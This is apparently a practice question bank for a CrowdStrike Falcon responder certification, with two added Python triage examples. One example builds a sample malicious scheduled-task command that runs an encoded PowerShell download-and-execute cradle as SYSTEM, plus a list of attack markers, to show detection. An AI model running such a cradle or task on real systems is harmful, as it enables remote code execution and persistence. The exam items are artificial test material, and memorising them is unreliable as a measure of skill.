
CCFR-201b Questions and Answers

Question # 6

What are Event Actions?

A.

Automated searches that can be used to pivot between related events and searches

B.

Pivotable hyperlinks available in a Host Search

C.

Custom event data queries bookmarked by the currently signed in Falcon user

D.

Raw Falcon event data

Question # 7

Depending on the subscription level, "Cloudable Events" (standard telemetry) have a specific retention period. What is the minimum period of time that these events are retained?

A.

1 day

B.

7 days

C.

14 days

D.

30 days

Question # 8

What happens when you open the full detection details?

A.

The process explorer opens and the detection is removed from the console

B.

The process explorer opens and you're able to view the processes and process relationships

C.

The process explorer opens and the detection copies to the clipboard

D.

The process explorer opens and the Event Search query is run for the detection

Question # 9

What information is contained within a Process Timeline?

A.

All cloudable process-related events within a given timeframe

B.

All cloudable events for a specific host

C.

Only detection process-related events within a given timeframe

D.

A view of activities on Mac or Linux hosts

Question # 10

Refer to the image.

You receive the detection displayed in the image above on a host in your environment.

Assuming you have the correct permissions, where would you navigate to remotely connect to the host and investigate further?

A.

Investigate > Connect to host

B.

View Incident > Connect to host

C.

Actions > Connect to host

Question # 11

Executive dashboards provide a high-level view of security. Which of the following CANNOT be seen from the Executive Summary Dashboard?

A.

Detections broken down by Tactic.

B.

A breakdown of Agent Versions across the fleet.

C.

The top 10 hosts with the most detections.

D.

The organization’s current CrowdScore trend.

Question # 12

During the triage of a detection involving a newly created persistent task, which specific indicator is most important for a responder to identify the actual intent of the service?

A.

The total CPU usage of the parent process.

B.

The command-line arguments used during the task creation.

C.

The Agent ID (AID) of the host where the detection fired.

D.

The physical location of the endpoint in the office.
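
The question above hinges on the command line being the one place where a newly created task's real purpose is visible: the task name and schedule say nothing about intent, the /tr action does. As an added example (not from the question bank and not CrowdStrike's code), the Python below parses a schtasks /create command line, pulls out the task name, schedule, run-as account and action, decodes a PowerShell -EncodedCommand payload when one is present, and lists what a responder would flag. The two command lines and the marker list are constructed for the example; real Falcon telemetry would supply the command line in the CommandLine field of the process event.

```python
import base64

# Markers a responder looks for in a task's action. A heuristic chosen for this example,
# not a CrowdStrike list; matched case-insensitively against the action string and
# against the decoded script, if any.
SUSPICIOUS_MARKERS = {
    "download cradle": ("downloadstring", "downloadfile", "invoke-webrequest", "bitsadmin"),
    "in-memory execution": ("iex ", "iex(", "invoke-expression"),
    "hidden window": ("-w hidden", "-windowstyle hidden"),
    "bypasses execution policy": ("-ep bypass", "-executionpolicy bypass"),
}


def split_args(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs together
    (quotes removed). Deliberately simpler than CommandLineToArgvW; enough for schtasks."""
    args, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_schtasks(cmdline):
    """Map the value-taking schtasks /create switches to their values (keys lower-cased)."""
    value_switches = {"/tn", "/tr", "/sc", "/ru", "/rp", "/st", "/mo"}
    args = split_args(cmdline)
    parsed = {}
    for i, arg in enumerate(args[:-1]):
        if arg.lower() in value_switches:
            parsed[arg.lower()] = args[i + 1]
    return parsed


def decode_encoded_command(action):
    """Return the UTF-16LE script behind powershell -EncodedCommand (any unambiguous
    prefix such as -e, -ec, -enc is accepted, as PowerShell does), or None."""
    toks = split_args(action)
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] not in "-/":
            continue
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # not valid base64 / UTF-16: report as undecodable
    return None


def triage_task(cmdline):
    """Summarise what a schtasks /create command line will actually run and why it matters."""
    switches = parse_schtasks(cmdline)
    action = switches.get("/tr", "")
    decoded = decode_encoded_command(action) if action else None
    haystack = (action + " " + (decoded or "")).lower()
    findings = [label for label, needles in SUSPICIOUS_MARKERS.items()
                if any(n in haystack for n in needles)]
    if decoded is not None:
        findings.append("encoded command")
    if switches.get("/ru", "").lower() in ("system", "nt authority\\system"):
        findings.append("runs as SYSTEM")
    return {"task": switches.get("/tn"), "schedule": switches.get("/sc"),
            "action": action, "decoded": decoded, "findings": findings}


# Constructed samples (not real telemetry). The first hides a download cradle behind
# -EncodedCommand and runs as SYSTEM at logon; the second is an ordinary backup job.
SAMPLE_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = ('schtasks.exe /create /tn "OneDrive Update" /sc onlogon /ru SYSTEM '
                  f'/tr "powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"')
BENIGN_CMDLINE = r'schtasks.exe /create /tn "Nightly Backup" /sc daily /st 02:00 /tr "C:\Tools\backup.exe --full"'

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        result = triage_task(line)
        print(result["task"], result["schedule"], result["findings"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Run it directly to print both triage results. The decoding step is not specific to scheduled tasks: the same -EncodedCommand pattern turns up in service binaries, Run keys and child processes of Office applications, and the command line is the field to read in each case.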

Question # 13

CrowdStrike provides 'OverWatch Best Practices' for triaging alerts. According to these guidelines, what is the next step a responder should take immediately after the 'Understand the detection' step?

A.

Isolate the host from the network.

B.

Review the process tree to understand the origin of the activity.

C.

Perform an OSINT search for the suspicious hash.

D.

Resolve the detection as a True Positive.

Question # 14

The MITRE-Based Falcon Detections Framework is a core component of the Falcon UI. What is the primary operational advantage provided by this framework to a Tier 1 responder?

A.

It allows for the automated decryption of files affected by ransomware.

B.

It provides a standardized view of the attack lifecycle to help understand adversary behavior.

C.

It enables the sensor to block kernel-level drivers from unknown publishers.

D.

It provides a real-time count of the total number of files on the endpoint.

Question # 15

A security responder is investigating a detection where a low-privileged process attempted to manipulate a system token to gain administrative rights. Within the specific terminology used by the Falcon console, 'Privilege Escalation' is classified as a:

A.

Technique

B.

Tactic

C.

Objective

D.

Indicator

Question # 16

How are processes on the same plane ordered (bottom 'VMTOOLSD.EXE' to top 'CMD.EXE')?

Refer to the image.

A.

Process ID (Descending, highest on bottom)

B.

Time started (Descending, most recent on bottom)

C.

Time started (Ascending, most recent on top)

D.

Process ID (Ascending, highest on top)

Question # 17

CrowdScore is a metric used to identify the severity of an ongoing incident. What percentage of increase in a CrowdScore is considered a strong indication of a coordinated attack?

A.

10%

B.

20%

C.

50%

D.

100%

Question # 18

During a targeted investigation into a potentially compromised internal administrative account, a responder utilizes the User Search functionality within the Investigate menu. The goal is to identify if the account was leveraged to drop or launch unauthorized binaries across multiple systems in the environment. Which specific data category is natively visible in the User Search results to facilitate this check?

A.

Registry Key Operations

B.

Network File Transfer ports

C.

Unique Executables Written and Process Executions

D.

BIOS and Hardware modification logs

Question # 19

Responders often need to organize detections to identify trends across the environment. Which of the following is NOT a grouping option currently available on the 'Endpoint Detections' page?

A.

Grouped by Process

B.

Grouped by Alert

C.

Grouped by File Path

D.

Grouped by Severity

Question # 20

A responder is explaining the quarantine process to a system administrator. What happens technically when a file is quarantined by the Falcon sensor?

A.

It is deleted from the disk and a log is sent to the cloud.

B.

It is moved to the CrowdStrike Cloud and removed from the local host immediately.

C.

It is compressed, password protected, and moved to the Quarantine folder on the endpoint.

D.

It is renamed to a .tmp extension and moved to the Windows Recycle Bin.

Question # 21

When an organization needs to detect a specific behavior that is unique to their environment, they can create a Custom IOA. Which of the following is NOT required when configuring a custom IOA from scratch?

A.

Selecting a Rule Type (e.g., Process Creation).

B.

Specifying the Severity level of the resulting detection.

C.

Assigning a specific host group to the IOA rule at the time of creation.

D.

Providing a unique name for the rule.

Question # 22

The primary purpose for running a Hash Search is to:

A.

determine any network connections

B.

review the processes involved with a detection

C.

determine the origin of the detection

D.

review information surrounding a hash's related activity

Question # 23

After pivoting to an event search from a detection, you locate the ProcessRollup2 event. Which two field values are you required to obtain to perform a Process Timeline search so you can determine what the process was doing?

A.

SHA256 and TargetProcessId_decimal

B.

SHA256 and ParentProcessId_decimal

C.

aid and ParentProcessId_decimal

D.

aid and TargetProcessId_decimal

Question # 24

When training a new team member on how to interpret Falcon telemetry, a senior responder explains the definition of a 'Tactic'. Which of the following sentences best captures the technical definition of a Tactic in this context?

A.

It represents the specific software version or exploit code used to crash a service.

B.

It is the adversary's tactical goal: the fundamental reason for performing a specific action.

C.

It is the unique cryptographic hash associated with a malicious file discovered on disk.

D.

It is the specific command-line string used to execute a PowerShell script.

Question # 25

Which tool or search type is recommended as the "best search" to use when performing the "Examine what's normal for this system" step in an investigation?

A.

User Search

B.

Host Search

C.

Hash Search

D.

IP Search

Question # 26

After an investigation, the following malicious artifacts have been identified:

    C:\Users\*\AppData\iamnotmalware.exe

    C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iamnotmalware.lnk

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamnotmalware_really

What method will remove all associated artifacts from hosts that trigger future related detections?

A.

Create a Quarantine Rule that will quarantine all identified artifacts across the entire environment

B.

Create Custom IOA rules to prevent the execution of these artifacts

C.

Create a workflow to trigger on a new endpoint detection, query the telemetry data of the endpoint for known artifacts, and select Remove All Associated Artifacts as an action

D.

Create a workflow to trigger on a new endpoint detection, conditions that match the detection, and as an action a PowerShell script to kill associated processes and remove all artifacts

Question # 27

What types of events are returned by a Process Timeline?

A.

Only detection events

B.

All cloudable events

C.

Only process events

D.

Only network events

Question # 28

Refer to the image.

You are investigating a network connection in event search.

Which option next to the raw event data should you select to pivot to a graphical representation for all the processes related to the network connection event?

A.

Inspect

B.

Show Responsible Process Data

C.

Draw Process Explorer

D.

Show Associated Event Data

Question # 29

A responder needs to view a high-level overview of the environment's security posture. Where can they find the 'Activity Dashboard'?

A.

Investigate > Activity Dashboard

B.

Endpoint Security > Monitor > Activity Dashboard

C.

Configuration > General > Activity Dashboard

D.

Support > Analytics > Activity Dashboard

Question # 30

Which of the following tactic and technique combinations is sourced from MITRE ATT&CK information?

A.

Falcon Intel via Intelligence Indicator - Domain

B.

Machine Learning via Cloud-Based ML

C.

Malware via PUP

D.

Credential Access via OS Credential Dumping

Question # 31

In the full detection tree view, icons provide visual cues about the telemetry. What does the specific icon representing a 'Falcon' (blue bird) indicate to the responder?

A.

The file has been successfully quarantined by the sensor.

B.

There is related Intelligence (Intel) data available for this detection.

C.

The process has been identified as a legitimate system file.

D.

The host is currently undergoing a remote live response session.

Question # 32

During the incident response process, a responder must update the status of a detection. Which of the following options is NOT a valid detection status recognized by the Falcon console?

A.

New

B.

Complete

C.

In Progress

D.

True Positive

Question # 33

The User Search results are organized into several categories. Which of the following is NOT a sub-heading in the User Search?

A.

User Logons

B.

Unique Executables Written

C.

Admin tool usage

D.

Network Connections

Question # 34

What happens when a hash is allowlisted?

A.

Execution is prevented, but detection alerts are suppressed

B.

Execution is allowed on all hosts, including all other Falcon customers

C.

The hash is submitted for approval to be allowed to execute once confirmed by Falcon specialists

D.

Execution is allowed on all hosts that fall under the organization's CID

Question # 35

From the Detections page, how can you view 'in-progress' detections assigned to Falcon Analyst Alex?

A.

Filter on 'Analyst: Alex'

B.

Alex does not have the correct role permissions as a Falcon Analyst to be assigned detections

C.

Filter on 'Hostname: Alex' and 'Status: In-Progress'

D.

Filter on 'Status: In-Progress' and 'Assigned-to: Alex'

Question # 36

You found a list of SHA256 hashes in an intelligence report and search for them using the Hash Execution Search. What can be determined from the results?

A.

Identifies a detailed list of all process executions for the specified hashes

B.

Identifies hosts that loaded or executed the specified hashes

C.

Identifies users associated with the specified hashes

D.

Identifies detections related to the specified hashes

Question # 37

Which of the following sentences best describes the technical visibility provided by the 'Host Timeline' view?

A.

A list of every time a user has logged in or out of the machine.

B.

Every host-relevant event (Process, File, Registry, Network) recorded in a given timeframe.

C.

A history of every hardware change or driver update on the endpoint.

D.

A log of every time the Falcon sensor was updated or restarted.

Question # 38

A responder is unsure about the difference between 'Detection' and 'Prevention' settings. Where can they find information about Detection and Prevention Policies?

A.

On the public CrowdStrike blog.

B.

In the Support page under the Docs section.

C.

By clicking the 'About' button in the user profile.

D.

In the training videos on the main Dashboard.

Question # 39

What is an advantage of using a Process Timeline?

A.

Process related events can be filtered to display specific event types

B.

Suspicious processes are color-coded based on their frequency and legitimacy over time

C.

Processes responsible for spikes in CPU performance are displayed over time

D.

A visual representation of Parent-Child and Sibling process relationships is provided

Question # 40

While examining the 'Process Details' sidebar of a detection, a responder sees the following icons: "25 Network Operations" and "277 Disk Operations". What does this contextual data represent?

A.

The percentage of the CPU being consumed by the network and disk.

B.

The specific number of telemetry events recorded for network and disk activity by that process.

C.

The total size in megabytes of the data sent over the network and written to disk.

D.

The number of other hosts that have seen similar network and disk activity.

Question # 41

The Falcon sensor can take several automated actions to protect an endpoint. Which of the following is NOT an action that Falcon takes upon detection?

A.

Process Termination

B.

File Quarantine

C.

Process Restart

D.

Network Isolation

Question # 42

Evaluate the following process tree observed in a detection:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe

Based on the parent-child relationships, which entry source is most likely?

A.

A remote service exploitation targeting a system process.

B.

A phishing attack where the user executed a malicious file from the desktop.

C.

A scheduled task running under the SYSTEM account.

D.

A supply chain attack targeting the Windows Boot manager.
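
The chain above is read by following each process's parent up to the root. As an added example (not CrowdStrike's code and not part of the question bank), the Python below rebuilds such a chain from ProcessRollup2-style events keyed on aid and TargetProcessId_decimal (the two fields Question # 23 asks for), orders siblings by start time (Question # 16), lists a process's children (Question # 44) and applies a simple heuristic for the entry source. The events are constructed; aid, TargetProcessId_decimal and ParentProcessId_decimal are the fields the questions name, while FileName, CommandLine and ProcessStartTime_decimal are assumed companion fields. One caveat a responder should keep in mind: in Falcon telemetry TargetProcessId_decimal is a sensor-assigned identifier, not the operating-system PID (that is carried separately as RawProcessId_decimal), which is why aid plus TargetProcessId_decimal is enough to pin down one process even after PID reuse.

```python
from collections import defaultdict

# Constructed sample of ProcessRollup2-style events for one host (fake aid), not real
# telemetry. TargetProcessId_decimal is the sensor's own process identifier, not the OS PID.
AID = "0123456789abcdef0123456789abcdef"


def _ev(tpid, ppid, name, started, cmdline=""):
    return {"aid": AID, "TargetProcessId_decimal": tpid, "ParentProcessId_decimal": ppid,
            "FileName": name, "CommandLine": cmdline, "ProcessStartTime_decimal": started}


EVENTS = [
    _ev(4,   0,   "System",       1700000000),
    _ev(100, 4,   "smss.exe",     1700000001),
    _ev(200, 100, "winlogon.exe", 1700000002),
    _ev(210, 100, "wininit.exe",  1700000002),
    _ev(250, 210, "services.exe", 1700000003),
    _ev(300, 200, "userinit.exe", 1700000004),
    _ev(400, 300, "explorer.exe", 1700000005),
    _ev(700, 250, "svchost.exe",  1700000006, "svchost.exe -k netsvcs -s Schedule"),
    _ev(550, 400, "vmtoolsd.exe", 1700000010),
    _ev(500, 400, "windows_media_player_y35s21-4ak.exe", 1700000020,
        r"C:\Users\alice\Desktop\windows_media_player_y35s21-4ak.exe"),
    _ev(600, 500, "cmd.exe",      1700000021, "cmd.exe /c whoami"),
    _ev(710, 700, "updater.exe",  1700000030, r"C:\ProgramData\updater.exe /silent"),
]


def index_processes(events):
    """Index events by (aid, TargetProcessId_decimal) and group children under their parent key."""
    by_id, children = {}, defaultdict(list)
    for ev in events:
        by_id[(ev["aid"], ev["TargetProcessId_decimal"])] = ev
        children[(ev["aid"], ev["ParentProcessId_decimal"])].append(ev)
    return by_id, children


def ancestry(events, aid, tpid):
    """Follow ParentProcessId_decimal links from (aid, tpid) to the root; file names root-first."""
    by_id, _ = index_processes(events)
    chain, seen, key = [], set(), (aid, tpid)
    while key in by_id and key not in seen:  # 'seen' guards against cyclic or garbled data
        seen.add(key)
        chain.append(by_id[key]["FileName"])
        key = (aid, by_id[key]["ParentProcessId_decimal"])
    chain.reverse()
    return chain


def render_chain(chain):
    return " > ".join(chain)


def children_by_start(events, aid, tpid):
    """Direct children of (aid, tpid), ordered by start time (earliest first)."""
    _, children = index_processes(events)
    kids = sorted(children[(aid, tpid)], key=lambda e: e["ProcessStartTime_decimal"])
    return [e["FileName"] for e in kids]


def siblings_by_start(events, aid, tpid):
    """Processes sharing the target's parent (target included), ordered by start time."""
    by_id, _ = index_processes(events)
    parent = by_id[(aid, tpid)]["ParentProcessId_decimal"]
    return children_by_start(events, aid, parent)


def likely_entry(chain):
    """Heuristic for where a chain entered the host (an assumption for this example, not a
    Falcon classification): anything beneath explorer.exe was launched from the interactive
    desktop session; anything beneath services.exe started as a service or scheduled task."""
    names = {n.lower() for n in chain}
    if "explorer.exe" in names:
        return "interactive user session"
    if "services.exe" in names:
        return "service or scheduled task"
    return "undetermined"


if __name__ == "__main__":
    for tpid in (600, 710):
        chain = ancestry(EVENTS, AID, tpid)
        print(f"{render_chain(chain)}\n  entry: {likely_entry(chain)}")
    print("children of explorer.exe:", children_by_start(EVENTS, AID, 400))
```

Run it directly to print the two chains and explorer.exe's children in start order. The explorer.exe test encodes the reasoning the process tree invites: a binary started beneath userinit.exe > explorer.exe was launched from the interactive desktop session (a double-click, a shortcut, an opened attachment), not by a service, a scheduled task or the boot chain, and the CommandLine of that binary then tells you which.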

Question # 43

During the configuration of a new IOA rule, the administrator must decide what action the sensor should take. Which of the following is NOT a valid IOA rule action?

A.

Monitor

B.

Block

C.

No Action

D.

Kill Process

Question # 44

From a detection, what is the fastest way to see children and sibling process information?

A.

Select the Event Search option. Then from the Event Actions, select Show Associated Event Data (From TargetProcessId_decimal)

B.

Select Full Detection Details from the detection

C.

Right-click the process and select "Follow Process Chain"

D.

Select the Process Timeline feature, enter the AID, Target Process ID, and Parent Process ID

Question # 45

What is the difference between Managed and Unmanaged Neighbors in the Falcon console?

A.

A managed neighbor is currently network contained and an unmanaged neighbor is uncontained

B.

A managed neighbor has an installed and provisioned sensor

C.

An unmanaged neighbor is in a segmented area of the network

D.

A managed sensor has an active prevention policy

Question # 46

A responder needs to find a specific sequence of network connections that did not trigger a detection. Which search tool allows them to search for anything within the raw telemetry?

A.

Host Search

B.

Event Search

C.

Hash Search

D.

User Search

Question # 47

Detections in Falcon are classified by their origin. Which of the following is NOT a recognized type of detection?

A.

Machine Learning

B.

Behavioral

C.

Intelligence

D.

Custom IOA

Question # 48

Refer to the image.

What does the arrowed line indicate?

A.

PowerShell spawned Notepad.exe, which injected a thread back to Excel.exe

B.

The thread injection was considered a Medium severity injection

C.

PowerShell spawned Notepad.exe, which injected a thread back to PowerShell

D.

Notepad.exe injected itself into Excel.exe

Question # 49

Aside from a Process Timeline or Event Search, how do you export process event data from a detection in .CSV format?

A.

You can't export detailed event data from a detection; you have to use the Process Timeline or an Event Search

B.

In Full Detection Details, you expand the nodes of the process tree you wish to export and then click the "Export Process Events" button

C.

In Full Detection Details, you choose the "View Process Activity" option and then export from that view

D.

From the Detections Dashboard, you right-click the event type you wish to export and choose CSV, JSON or XML

Question # 50

An analyst needs to perform local sandbox analysis on a malicious file. When they download a quarantined file from the Falcon UI, what is the file format and the default password?

A.

.zip, password: crowdstrike

B.

.7z, password: infected

C.

.rar, password: malware

D.

.exe, no password

Question # 51

A responder needs to categorize an incident based on the high-level goals of the attacker. Which of the following lists correctly identifies the "Objectives" as they are natively defined and used within the Falcon platform?

A.

Explore, Keep Access, Gain Access, Falcon Detection Method, Contact Controlled systems, Follow Through

B.

Reconnaissance, Delivery, Weaponization, Exploitation, Installation, Command and Control

C.

Identify, Protect, Detect, Respond, Recover, Lessons Learned

D.

Triage, Containment, Remediation, Eradication, Reporting, Recovery

Question # 52

How long does detection data remain in the CrowdStrike Cloud before purging begins?

A.

90 Days

B.

45 Days

C.

30 Days

D.

14 Days

Question # 53

Refer to the image.

In the Full Detection View while viewing the Process Tree you see an attack outlined as in the image above.

Based on what you see, what happened during the attack?

A.

The attacker launched a command prompt, renamed binaries, executed malware, and prepared exfiltration

B.

The attacker launched a command prompt to establish a reverse shell to grant remote code execution capabilities

C.

The attacker executed malware, renamed binaries, prepared exfiltration, and deleted backups to prevent recovery

D.

The attacker launched a command prompt, enumerated the host, created persistence, and deleted backups to prevent recovery

Question # 54

To understand how a threat moved on a system, a responder must know the role of common processes. Which of the following statements best describes the standard functionality of explorer.exe?

A.

It is a system process responsible for the Local Security Authority subsystem.

B.

It is the primary process responsible for the File Explorer UI and the user's desktop environment.

C.

It is the Windows Command Processor used for executing batch files.

D.

It is the service control manager that handles the starting of background tasks.

Question # 55

While most searches are accessible from a detection, some require a manual jump. Which search is not available as a direct pivot from a detection?

A.

Host Search

B.

Hash Search

C.

User Search

D.

IP Search

Question # 56

Host Search is a powerful investigation tool. From which of the following sources is a responder most likely to pivot directly to a Host Search?

A.

A global intelligence report about a new adversary.

B.

A specific detection that occurred on a particular host.

C.

The main settings menu of the Falcon console.

D.

The help documentation in the Support portal.

Question # 57

You receive an email from a third-party vendor that one of their services is compromised; the vendor names a specific IP address that the compromised service was using. Where would you input this indicator to find any activity related to this IP address?

A.

IP Addresses

B.

Remote or Network Logon Activity

C.

Remote Access Graph

D.

Hash Executions

Question # 58

Which Executive Summary dashboard item indicates sensors running with unsupported versions?

A.

Detections by Severity

B.

Inactive Sensors

C.

Sensors in RFM

D.

Active Sensors

Question # 59

CrowdStrike supports various deployment types. What is a 'POD sensor'?

A.

A sensor specifically designed for mobile devices (iOS/Android).

B.

A sensor that is installed directly on a Kubernetes or Docker host to monitor containers.

C.

A legacy sensor used only for disconnected or air-gapped systems.

D.

A physical appliance that sits on the network to monitor traffic.
